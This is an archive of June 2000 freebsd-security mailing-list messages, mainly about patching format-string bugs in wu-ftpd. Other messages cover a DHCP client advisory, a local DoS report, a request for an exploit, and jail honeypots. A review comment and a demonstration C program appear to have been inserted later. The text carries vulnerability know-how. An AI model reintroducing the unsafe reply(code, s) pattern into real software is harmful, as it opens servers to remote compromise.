Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994
In-Reply-To: <20000624013253.13481.qmail@smtp.246.ne.jp> "from Koga Youichirou at Jun 24, 2000 10:32:21 am"
To: Koga Youichirou
Date: Fri, 23 Jun 2000 21:11:46 -0700 (PDT)
Cc: wollman@khavrinen.lcs.mit.edu, silby@silby.com, freebsd-security@FreeBSD.ORG
Organization: HackerDome
Reply-To: dima@rdy.com
From: dima@rdy.com (Dima Ruban)
X-Mailer: ELM [version 2.4ME+ PL77 (25)]
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII

What's the purpose of this patch? I didn't look at the code, but to me it sounds like it's pretty much irrelevant whether you're gonna use ``foo(fmt, string)'' or ``foo(string)''.

Koga Youichirou writes:
> Garrett Wollman :
> > Here's a patch (mangled by cut&paste) which hacks around the problem.
>
> The Debian team has already released a fixed package.
> A patch is available from:
>
> http://security.debian.org/dists/potato/updates/main/source/wu-ftpd_2.6.0-5.1.diff.gz
>
> Then I checked it and I found that there is some other undesirable
> code in ftpd.c. Probably this code does not lead to a security flaw,
> but I think that it should be corrected.
>
> The following patch corrects it (incl. a part of Debian's patch),
> and I have sent it to the wu-ftpd development team.
>
> Index: ftpcmd.y > =================================================================== > RCS file: /usr/cvs/src/wu-ftpd/src/ftpcmd.y,v > retrieving revision 1.1.1.1 > diff -u -r1.1.1.1 ftpcmd.y > --- ftpcmd.y 1999/10/21 11:50:51 1.1.1.1 > +++ ftpcmd.y 2000/06/23 08:19:30 > @@ -1926,13 +1926,13 @@ > } > if (!maxfound) > maxlines = defmaxlines; > - lreply(200, cmd); > + lreply(200, "%s", cmd); > while (fgets(buf, sizeof buf, cmdf)) { > size_t len = strlen(buf); > > if (len > 0 && buf[len - 1] == '\n') > buf[--len] = '\0'; > - lreply(200, buf); > + lreply(200, "%s", buf); > if (maxlines <= 0) > ++lines; > else if (++lines >= maxlines) { > Index: ftpd.c > =================================================================== > RCS file: /usr/cvs/src/wu-ftpd/src/ftpd.c,v > retrieving revision 1.1.1.1.2.10 > diff -u -r1.1.1.1.2.10 ftpd.c > --- ftpd.c 2000/03/17 02:01:57 1.1.1.1.2.10 > +++ ftpd.c 2000/06/23 08:47:21
> @@ -2012,9 +2012,9 @@ > s = strsep(&cp, "\n"); > if (cp == NULL || *cp == '\0') > break; > - lreply(331, s); > + lreply(331, "%s", s); > } > - reply(331, s); > + reply(331, "%s", s); > } > else { > #endif > @@ -2495,7 +2495,7 @@ > #ifdef BSD_AUTH > if (ext_auth) { > if ((salt = check_auth(the_user, passwd))) { > - reply(530, salt); > + reply(530, "%s", salt); > #ifdef LOG_FAILED /* 27-Apr-93 EHK/BM */ > syslog(LOG_INFO, "failed login from %s", > remoteident); > @@ -3160,7 +3160,7 @@ > reply(230, "User %s logged in.%s", pw->pw_name, guest ? > " Access restrictions apply." : ""); > sprintf(proctitle, "%s: %s", remotehost, pw->pw_name); > - setproctitle(proctitle); > + setproctitle("%s", proctitle); > if (logging) > syslog(LOG_INFO, "FTP LOGIN FROM %s, %s", remoteident, pw->pw_name); > /* H* mod: if non-anonymous user, copy it to "authuser" so everyone can > @@ -5908,7 +5908,7 @@ > > remotehost[sizeof(remotehost) - 1] = '\0'; > sprintf(proctitle, "%s: connected", remotehost); > - setproctitle(proctitle); > + setproctitle("%s", proctitle); > > wu_authenticate(); > /* Create a composite source identification string, to improve the logging 
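Review bot: In the @@ -5908 hunk, `sprintf(proctitle, "%s: connected", remotehost)` is still unbounded: the line above it caps `remotehost` at `sizeof(remotehost) - 1`, but nothing ties that size to `proctitle`, so `snprintf(proctitle, sizeof(proctitle), "%s: connected", remotehost)` would be the natural companion to the `setproctitle("%s", proctitle)` change, and the same goes for `sprintf(proctitle, "%s: %s", remotehost, pw->pw_name)` in the @@ -3160 hunk. The `setproctitle` change itself should stay: `proctitle` is built from the peer's host name, so passing it as the format string would let a `%` in that name be interpreted.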
> @@ -6318,7 +6318,7 @@ > dirlist = ftpglob(whichfiles); > sdirlist = dirlist; /* save to free later */ > if (globerr != NULL) { > - reply(550, globerr); > + reply(550, "%s", globerr); > goto globfree; > } > else if (dirlist == NULL) {
>
>
> Regards,
>
> --
> Koga, Youichirou
>

--
dima

From owner-freebsd-security Fri Jun 23 21:36:40 2000
Received: from decoy.sfc.keio.ac.jp (decoy.sfc.keio.ac.jp [133.27.84.101]) by hub.freebsd.org (Postfix) with ESMTP id 52AAD37BB23 for ; Fri, 23 Jun 2000 21:36:27 -0700 (PDT) (envelope-from say@sfc.wide.ad.jp)
Received: from localhost (localhost.sfc.keio.ac.jp [127.0.0.1]) by decoy.sfc.keio.ac.jp (8.9.3/8.9.3) with ESMTP id NAA06961; Sat, 24 Jun 2000 13:35:50 +0900 (JST) (envelope-from say@sfc.wide.ad.jp)
To: adsharma@sharmas.dhs.org
Cc: security@FreeBSD.ORG
Subject: Re: FreeBSD 4.0 ipsec and Nortel extranet
From owner-freebsd-security Fri Jun 23 21:36:40 2000
From: ARIGA Seiji
To: adsharma@sharmas.dhs.org
Cc: security@FreeBSD.ORG
Subject: Re: FreeBSD 4.0 ipsec and Nortel extranet
Date: Sat, 24 Jun 2000 13:35:48 +0900
Message-Id: <20000624133548P.say@decoy.sfc.keio.ac.jp>
In-Reply-To: <20000623081828.A963@sharmas.dhs.org>
References: <20000623081828.A963@sharmas.dhs.org>

Hi,

On Fri, 23 Jun 2000 08:18:28 -0700, Arun Sharma wrote,
: My work place uses Nortel extranet ipsec for VPN and I'm forced to
: connect using my windows box. I was wondering if anyone had any
: success connecting a FreeBSD box to the Nortel server.

I'm afraid that nobody has connected a FreeBSD box to the Nortel server
yet. If you try to do that, you'd better use the latest KAME snap
(http://www.kame.net). And if you don't mind, please send the result to
snap-users@kame.net.

// ARIGA Seiji

From owner-freebsd-security Fri Jun 23 22: 2:13 2000
Message-ID: <3954410B.5716EE5D@softweyr.com>
Date: Fri, 23 Jun 2000 23:03:07 -0600
From: Wes Peters
Organization: Softweyr LLC
To: dima@rdy.com
Cc: Koga Youichirou, wollman@khavrinen.lcs.mit.edu, silby@silby.com, freebsd-security@FreeBSD.ORG
Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least 1994
References: <200006240411.VAA82687@sivka.rdy.com>

Dima Ruban wrote:
>
> What's the purpose of this patch?
> I didn't look at the code, but to me it sounds like it's pretty much
> irrelevant whether you gonna use ``foo(fmt, string)'' or ``foo(string)''

If string contains formatting codes, foo("%s", string) does the right thing
and just puts out the formatting codes in the string. foo(string) tries to
interpret the embedded format codes and blows the stack.

--
"Where am I, and what am I doing in this handbasket?"

Wes Peters                                                Softweyr LLC
wes@softweyr.com                                        http://softweyr.com/
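Wes Peters' point above, as an added example (not wu-ftpd's code and not from anyone in the thread): a printf-style stand-in for reply() is called the "before" way and the "after" way on the same untrusted string, and the function carries the compiler attribute that makes -Wformat-security flag the bad pattern. The names format_reply, reply_before, reply_after and count_directives are assumed here, and the input string is constructed.

```c
/* Added example: why reply(code, s) and reply(code, "%s", s) differ when
 * s is attacker-controlled.  Build with:
 *   cc -Wall -Wformat -Wformat-security fmt_demo.c
 * and the compiler warns on the reply_before() call site. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for wu-ftpd's reply(): printf-like, writes
 * "code text\r\n" into out.  The format attribute tells gcc/clang which
 * parameter is the format, so -Wformat-security can warn whenever a
 * caller passes a non-literal format with no further arguments. */
static int format_reply(char *out, size_t outsz, int code, const char *fmt, ...)
    __attribute__((format(printf, 4, 5)));

static int format_reply(char *out, size_t outsz, int code, const char *fmt, ...)
{
    va_list ap;
    int n = snprintf(out, outsz, "%d ", code);
    if (n < 0 || (size_t)n >= outsz)
        return -1;
    va_start(ap, fmt);
    int m = vsnprintf(out + n, outsz - (size_t)n, fmt, ap);
    va_end(ap);
    if (m < 0 || (size_t)(n + m) + 2 >= outsz)
        return -1;                 /* truncated: refuse rather than emit */
    memcpy(out + n + m, "\r\n", 3);  /* copies the terminating NUL too */
    return n + m + 2;
}

/* The "before" shape of the patched calls: the untrusted text *is* the
 * format string, so every '%' in it is interpreted.  Demonstrated with
 * "%%" only, which is well-defined; other directives in untrusted input
 * make the call undefined behaviour. */
static int reply_before(char *out, size_t outsz, int code, const char *text)
{
    return format_reply(out, outsz, code, text);
}

/* The "after" shape: the text is an argument to the fixed "%s" format
 * and is copied out byte for byte. */
static int reply_after(char *out, size_t outsz, int code, const char *text)
{
    return format_reply(out, outsz, code, "%s", text);
}

/* Triage helper: counts the conversion directives that would be
 * interpreted if s were used as a format, i.e. every '%' that is not
 * part of a literal "%%".  Handy for scanning banner files or logs. */
static int count_directives(const char *s)
{
    int count = 0;
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {         /* "%%" prints a single percent sign */
            p++;
            continue;
        }
        count++;
    }
    return count;
}

int main(void)
{
    char buf[128];
    const char *banner = "50%% off";   /* constructed untrusted input */

    reply_before(buf, sizeof buf, 331, banner);
    printf("before: %s", buf);         /* 331 50% off   ('%%' consumed) */
    reply_after(buf, sizeof buf, 331, banner);
    printf("after:  %s", buf);         /* 331 50%% off  (verbatim) */
    printf("directives in \"user %%s from %%x\": %d\n",
           count_directives("user %s from %x"));
    return 0;
}
```

The same "%%" input comes out as one percent sign through reply_before and two through reply_after, which is the difference Wes describes; a buffer too small for the reply makes format_reply return -1 instead of truncating silently.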
From owner-freebsd-security Fri Jun 23 22:11:42 2000
Date: Sat, 24 Jun 2000 01:12:38 -0400 (EDT)
From: Bosko Milekic
To: Christiaan Rademan
Cc: security@FreeBSD.ORG
Subject: Re: Security Bug.
In-reply-to: <39541671.84FFC647@mics.co.za>

On Sat, 24 Jun 2000, Christiaan Rademan wrote:

> Hi.
>
> I am hosting a shell server, for my dialup users at an ISP.

That's problem #1. :-)

> We have one slight problem, there is a DoS attack that affects
> FBSD4.0Stable locally
> and other FBSD releases.
>
> If the DoS attack is run locally, the system stops accepting
> connections then dies off.
>
> Here is the bug... :-) if there is a patch already please post it
> here...

This is a resource exhaustion, previously it panic-ed the machine. It no
longer does. Also, the socket buffer size (sbsize) limit very much exists.
The fact that you haven't carefully read login.conf(5) and are running a
public shell server is problem #2.

[...]

Hope this helps,
Bosko.

--
Bosko Milekic * Voice/Mobile: 514.865.7738 * Pager: 514.921.0237
bmilekic@technokratis.com * http://www.technokratis.com/

From owner-freebsd-security Sat Jun 24 4:39:25 2000
Date: Sat, 24 Jun 2000 04:39:22 -0700
From: "Andrey A. Chernov"
To: Koga Youichirou
Cc: wollman@khavrinen.lcs.mit.edu, silby@silby.com, freebsd-security@FreeBSD.ORG
Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least 1994
Message-ID: <20000624043922.A64898@freebsd.org>
References: <4.2.2.20000622201823.0479a690@mail.sentex.net> <200006231713.NAA49665@khavrinen.lcs.mit.edu> <20000624013253.13481.qmail@smtp.246.ne.jp>
In-Reply-To: <20000624013253.13481.qmail@smtp.246.ne.jp>; from y-koga@jp.FreeBSD.org on Sat, Jun 24, 2000 at 10:32:21AM +0900
Organization: Biomechanoid

On Sat, Jun 24, 2000 at 10:32:21AM +0900, Koga Youichirou wrote:
> Following patch corrects them (incl. a part of debian's patch),
> and I have sent it to wu-ftpd development team.

Thanx, committed.

--
Andrey A. Chernov
http://ache.pp.ru/

From owner-freebsd-security Sat Jun 24 12:16: 9 2000
Message-ID: <712384017032D411AD7B0001023D799B07C8D7@SN1EXCHMBX>
From: Nick Evans
To: "'Herbert J. McNew'"
Cc: "'freebsd-security@freebsd.org'"
Subject: RE: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options
Date: Sat, 24 Jun 2000 15:11:59 -0400

You might be able to use Nemesis to regenerate these types of packets:

http://celerity.bartoli.org/nemesis/

Nick

-----Original Message-----
From: Herbert J. McNew [mailto:herb@cais.net]
Sent: Friday, June 23, 2000 12:39 PM
To: security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options


Maybe I missed it, but does anyone have an exploit for this yet?  I have a
solution (that isn's a kernel recompile) that I'd like to test, but have
no way of doing so without an exploit.

Thanks.

_____________________
Herb McNew
Systems Administrator
CAIS Internet
(703) 247-6270
herb@cais.net

From owner-freebsd-security Sat Jun 24 12:42:50 2000
Message-Id: <200006241941.e5OJfu956111@cwsys.cwsent.com>
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
To: freebsd-security@freebsd.org
Subject: Possible root exploit in ISC DHCP client. (fwd)
Date: Sat, 24 Jun 2000 12:41:34 -0700

A quick fix to this problem, until dhclient in the base CVS tree can be
patched, is as follows:

1. Rename or remove /usr/src/contrib/isc-dhcp
2. fetch dhcp-2.0pl1.tar.gz and extract it into /usr/src/contrib
3. cd /usr/src/contrib && ln -s dhcp-2.0pl1 isc-dhcp
4. cd /usr/src/sbin/dhclient && make && make install clean
5. restart dhclient or reboot

It would probably be a good idea to update the isc-dhcp2 and isc-dhcp3
ports.

Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Team Leader, Sun/DEC Team   Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

------- Forwarded Message

[audit trail deleted]
Approved-By: aleph1@SECURITYFOCUS.COM
Message-ID: <200006240928.CAA06592@grosse.bisbee.fugue.com>
Date: Sat, 24 Jun 2000 02:28:58 -0700
Reply-To: Ted Lemon
Sender: Bugtraq List
From: Ted Lemon
Subject: Possible root exploit in ISC DHCP client.
To: BUGTRAQ@SECURITYFOCUS.COM
Resent-To: cy@passer.osg.gov.bc.ca
Resent-Date: Sat, 24 Jun 2000 12:15:21 -0700
Resent-From: Cy Schubert

Somebody at OpenBSD discovered a possible root exploit in the ISC DHCP
client. This exploit is present in all versions of the ISC DHCP client
prior to 2.0pl1 and 3.0b1pl14, which I just released this evening.
Anybody who is using versions of the ISC DHCP client other than these is
strongly urged to upgrade.

I would appreciate it if the OpenBSD people would take a look at the new
version to see if they believe it is a complete fix, and let me know if
it isn't. In any case, thanks for catching the error! I'm sorry I'm
being so vague about how this got found, but I don't have time to read
bugtraq anymore, so I was notified roughly fourth-hand.

The ISC DHCP distribution is available at ftp://ftp.isc.org/isc/DHCP,
and anonymous CVS at http://www.isc.org/products/DHCP/anoncvs.html. The
head of the tree in anonymous CVS also contains the fix.
_MelloN_

------- End of Forwarded Message

From owner-freebsd-security Sat Jun 24 12:57:29 2000
Date: Sat, 24 Jun 2000 12:55:40 -0700
From: "Crist J. Clark"
To: freebsd-security@freebsd.org
Subject: jail(8) Honeypots
Message-ID: <20000624125540.A256@dialin-client.earthlink.net>
Reply-To: cjclark@alum.mit.edu

I searched the mail archive and read the jail(8) manpage and was
surprised not to see any discussion of using jail for a honeypot,
an IDS. If I understand things correctly, one of the primary
motivations for the jail command is to isolate potentially exploitable
daemons and other programs so any damage done by an attacker is
minimized. It seems to me that it is such a logical extension to run a
_known_ exploitable process in a jail then watch for and document
attacks from outside that some people out there must be doing it.

So, is anyone out there doing this? Have any hints, gotchas, or really
cool ideas to share about setting a system like this up? It seems that
there are lots of possibilities.
One good box could look like
multiple machines running the same or different exploitable programs
to an attacker.

If no one out there is, I am going to give it a shot anyway. I'd still
appreciate any ideas.

--
Crist J. Clark                           cjclark@alum.mit.edu

From owner-freebsd-security Sat Jun 24 18:48:23 2000
Date: 25 Jun 2000 03:47:59 +0200
From: Cyrille Lefevre
Reply-To: clefevre@citeweb.net
To: security@FreeBSD.ORG
Subject: Re: Possible root exploit in ISC DHCP client. (fwd)
References: <200006241941.e5OJfu956111@cwsys.cwsent.com>
In-Reply-To: Cy Schubert - ITSD Open Systems Group's message of "Sat, 24 Jun 2000 12:41:34 -0700"

Cy Schubert - ITSD Open Systems Group writes:

> A quick fix to this problem, until dhclient in the base CVS tree can be
> patched is as follows:
>
> 1. Rename or remove /usr/src/contrib/isc-dhcp
> 2. fetch dhcp-2.0pl1.tar.gz and extract it into /usr/src/contrib
> 3. cd /usr/src/contrib && ln -s dhcp-2.0pl1 isc-dhcp
> 4. cd /usr/src/sbin/dhclient && make && make install clean
> 5. restart dhclient or reboot
>
> It would probably be a good idea to update the isc-dhcp2 and isc-dhcp3
> ports.

http://www.freebsd.org/cgi/query-pr.cgi?pr=19493

Cyrille.
--
home:mailto:clefevre@no-spam.citeweb.net   Remove "no-spam." to reply to me.
work:mailto:Cyrille.Lefevre@no-spam.edf.fr Remove "no-spam." to answer me back.

From owner-freebsd-security Sat Jun 24 19: 8:28 2000
Message-Id: <200006250207.e5P270a62238@cwsys.cwsent.com>
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
To: clefevre@citeweb.net
Cc: security@FreeBSD.ORG
Subject: Re: Possible root exploit in ISC DHCP client. (fwd)
In-reply-to: Your message of "25 Jun 2000 03:47:59 +0200."
Date: Sat, 24 Jun 2000 19:06:29 -0700

In message , Cyrille Lefevre writes:
> Cy Schubert - ITSD Open Systems Group writes:
>
> > A quick fix to this problem, until dhclient in the base CVS tree can be
> > patched is as follows:
> >
> > 1. Rename or remove /usr/src/contrib/isc-dhcp
> > 2. fetch dhcp-2.0pl1.tar.gz and extract it into /usr/src/contrib
> > 3. cd /usr/src/contrib && ln -s dhcp-2.0pl1 isc-dhcp
> > 4. cd /usr/src/sbin/dhclient && make && make install clean
> > 5. restart dhclient or reboot
> >
> > It would probably be a good idea to update the isc-dhcp2 and isc-dhcp3
> > ports.
>
> http://www.freebsd.org/cgi/query-pr.cgi?pr=19493

I suppose I ought to submit a PR for the base isc-dhcp too. It'll be
submitted tomorrow morning PDT.

Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Team Leader, Sun/DEC Team   Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

From owner-freebsd-security Sat Jun 24 23:13:21 2000
Date: Sun, 25 Jun 2000 07:20:49 +0200
From: Stephan Holtwisch
To: freebsd-security@freebsd.org
Subject: Re: jail(8) Honeypots
Message-ID: <20000625072049.A48985@rookie.org>
References: <20000624125540.A256@dialin-client.earthlink.net>
In-Reply-To: <20000624125540.A256@dialin-client.earthlink.net>; from cristjc@earthlink.net on Sat, Jun 24, 2000 at 12:55:40PM -0700

Hello,

On Sat, Jun 24, 2000 at 12:55:40PM -0700, Crist J. Clark wrote:
> I searched the mail archive and read the jail(8) manpage and was
> surprised not to see any discussion of using jail for a honeypot,
> an IDS. If I understand things correctly, one of the primary
> motivations for the jail command is to isolate potentially exploitable
> daemons and other programs so any damage done by an attacker is
> minimized. It seems to me that it is such a logical extension to run a
> _known_ exploitable process in a jail then watch for and document
> attacks from outside that some people out there must be doing it.
>
> So, is anyone out there doing this? Have any hints, gotchas, or really
> cool ideas to share about setting a system like this up? It seems that
> there are lots of possibilities. One good box could look like
> multiple machines running the same or different exploitable programs
> to an attacker.
>
> If no one out there is, I am going to give it a shot anyway. I'd still
> appreciate any ideas.

I do not know the jail implementation in FreeBSD too well.
However, to me it seems a very bad idea to run _known_ vulnerable
software within a jail, since that would mean the jail implementation
must not have bugs. You wouldn't run buggy software in a chrooted
environment either, would you?
In addition to this I don't see a real sense to run a 'victim' Host
as an IDS, where is the purpose of that?
It may be fun to watch people trying to mess up your system,
but most likely you will just catch lots of script kiddies.
Stephan

From owner-freebsd-security Sat Jun 24 23:35: 7 2000
Date: Sat, 24 Jun 2000 23:32:52 -0700
From: "Crist J. Clark"
To: Stephan Holtwisch
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: jail(8) Honeypots
Message-ID: <20000624233252.B181@dialin-client.earthlink.net>
Reply-To: cjclark@alum.mit.edu
References: <20000624125540.A256@dialin-client.earthlink.net> <20000625072049.A48985@rookie.org>
In-Reply-To: <20000625072049.A48985@rookie.org>; from sh@rookie.org on Sun, Jun 25, 2000 at 07:20:49AM +0200

On Sun, Jun 25, 2000 at 07:20:49AM +0200, Stephan Holtwisch wrote:
[snip]
> I do not know the jail implementation in FreeBSD too well.
> However, to me it seems a very bad idea to run _known_ vulnerable
> software within a jail, since that would mean the jail
> implementation must not have bugs.

AFAIK, there is no known method to get out of a FreeBSD jail. There are
always risks of exploits in any software.

> You wouldn't run buggy
> software in a chrooted environment either, would you?

No, there are known ways for root to escape a chroot'ed environment.
> In addition to this I don't see a real sense to run a 'victim'
> Host as an IDS, where is the purpose of that?
> It may be fun to watch people trying to mess up your system,
> but most likely you will just catch lots of script kiddies.

I would not run it naked on the Internet, but behind a firewall. You can
see if people are managing to circumvent your firewall, or more likely,
you might find people on your protected networks doing things they should
not be. Honeypots are not a new idea.

--
Crist J. Clark                           cjclark@alum.mit.edu

From owner-freebsd-security Sat Jun 24 23:40:55 2000
Date: Sun, 25 Jun 2000 01:40:47 -0500 (CDT)
From: Mike Silbersack
To: Koga Youichirou
Cc: wollman@khavrinen.lcs.mit.edu, freebsd-security@FreeBSD.ORG
Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least 1994
In-Reply-To: <20000624013253.13473.qmail@smtp.246.ne.jp>

On Sat, 24 Jun 2000, Koga Youichirou wrote:

> Garrett Wollman :
> > Here's a patch (mangled by cut&paste) which hacks around the problem.
>
> Debian team has already released a fixed package.
> A patch is available from:
>
> http://security.debian.org/dists/potato/updates/main/source/wu-ftpd_2.6.0-5.1.diff.gz
>
> Then I checked it and I found that there are some other undesirable
> codes in ftpd.c. Probably these codes do not lead to a security flaw,
> but I think that they should be corrected.

I'm sure that's what the people who fixed the last set of bugs in wuftpd
said when they came upon the bugs which comprise the current vuln. (But
decided not to fix them.)

Mike "Silby" Silbersack